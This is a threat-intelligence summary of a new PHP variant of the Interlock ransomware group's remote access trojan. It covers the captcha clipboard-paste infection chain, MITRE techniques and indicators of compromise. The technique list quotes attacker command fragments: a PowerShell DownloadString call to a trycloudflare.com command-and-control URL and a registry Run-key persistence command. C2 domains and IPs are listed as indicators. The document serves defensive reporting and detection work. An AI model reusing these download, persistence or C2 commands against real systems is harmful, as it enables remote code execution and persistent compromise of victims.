Researchers have identified a new variant of the Interlock ransomware group’s remote access trojan (RAT) that uses PHP instead of JavaScript, expanding its delivery methods in widespread cyber campaigns. This PHP-based Interlock RAT leverages compromised websites with injected scripts and a resilient command and control infrastructure using trycloudflare.com URLs and fallback IPs. #InterlockRAT #KongTuke #FileFix
Keypoints
- The Interlock ransomware group has developed a new PHP-based RAT variant, differing from the previously known JavaScript (Node.js) version.
- Since May 2025, the RAT has been observed in campaigns linked to LandUpdate808 (KongTuke) web-inject threat clusters involving compromised websites.
- The infection chain begins with a captcha and clipboard paste execution method that leads to running a PowerShell script launching the Interlock RAT.
- This PHP RAT variant performs automated discovery of system details using PowerShell commands, gathering extensive system, network, and privilege information.
- Command and control communication uses Cloudflare Tunnel service (trycloudflare.com) URLs with hardcoded fallback IPs for resilient connectivity.
- The RAT supports commands for executing EXE and DLL files, persistence via registry Run key modification, shell command execution, and self-termination.
- Lateral movement is performed through RDP, and the campaign appears opportunistic, targeting multiple industries.
MITRE Techniques
- [T1059] Command and Scripting Interpreter – The RAT uses PowerShell scripts executed via cmd.exe to automate system reconnaissance and command execution. (“powershell -c Get-NetNeighbor…”, “powershell -c systeminfo”)
- [T1071.001] Application Layer Protocol: Web Protocols – The RAT communicates with C2 servers using HTTP over trycloudflare.com URLs to disguise traffic. (“…DownloadString(“http://deadly-programming-attorneys-our.trycloudflare.com”)”)
- [T1543.003] Create or Modify System Process: Windows Service – Persistence is established via registry Run key creation. (“reg add HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v “REDACTED” …”)
- [T1021.001] Remote Services: Remote Desktop Protocol – Used for lateral movement across victim environments.
- [T1105] Ingress Tool Transfer – The RAT downloads executables (.exe) and DLLs for execution on the victim system.
Indicators of Compromise
- [File Hash] Config files associated with the RAT – 28a9982cf2b4fc53a1545b6ed0d0c1788ca9369a847750f5652ffa0ca7f7b7d3, 8afd6c0636c5d70ac0622396268786190a428635e9cf28ab23add939377727b0
- [Domain] Command and control infrastructure – existed-bunch-balance-councils.trycloudflare.com, ferrari-rolling-facilities-lounge.trycloudflare.com, and 4 more similar domains
- [IP Address] Fallback C2 IPs – 64.95.12.71, 184.95.51.165
Read more: https://thedfirreport.com/2025/07/14/kongtuke-filefix-leads-to-new-interlock-rat-variant/